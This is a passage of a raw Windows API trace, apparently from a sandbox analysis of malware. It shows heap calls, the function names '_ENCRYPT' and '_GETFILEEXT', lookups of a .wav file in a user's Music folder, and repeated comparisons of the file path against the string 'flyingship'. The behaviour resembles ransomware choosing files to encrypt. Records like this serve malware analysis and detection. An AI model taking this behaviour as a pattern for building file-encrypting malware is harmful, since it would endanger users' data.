HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0182.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0182.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0182.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0182.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0182.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0182.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0182.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0182.277] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0182.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0182.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0182.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0182.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0182.279] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0182.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0182.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0182.279] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0182.279] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.279] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0182.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0182.279] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f3a8660, ftCreationTime.dwHighDateTime=0x1d5de16, ftLastAccessTime.dwLowDateTime=0xbaaf0410, ftLastAccessTime.dwHighDateTime=0x1d5dc64, ftLastWriteTime.dwLowDateTime=0xbaaf0410, ftLastWriteTime.dwHighDateTime=0x1d5dc64, nFileSizeHigh=0x0, nFileSizeLow=0x181e2, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Ftar8k3covO_ce7D.wav", cAlternateFileName="FTAR8K~1.WAV")) returned 0x90add8 [0182.280] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0182.280] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f3a8660, ftCreationTime.dwHighDateTime=0x1d5de16, ftLastAccessTime.dwLowDateTime=0xbaaf0410, ftLastAccessTime.dwHighDateTime=0x1d5dc64, ftLastWriteTime.dwLowDateTime=0xbaaf0410, ftLastWriteTime.dwHighDateTime=0x1d5dc64, nFileSizeHigh=0x0, nFileSizeLow=0x181e2, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Ftar8k3covO_ce7D.wav", cAlternateFileName="FTAR8K~1.WAV")) returned 0x90add8 [0182.280] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0182.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="agIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eYbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YbmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mJwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JwmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wmxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mxhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xhP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hP\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ftar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ar8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="covO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ovO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 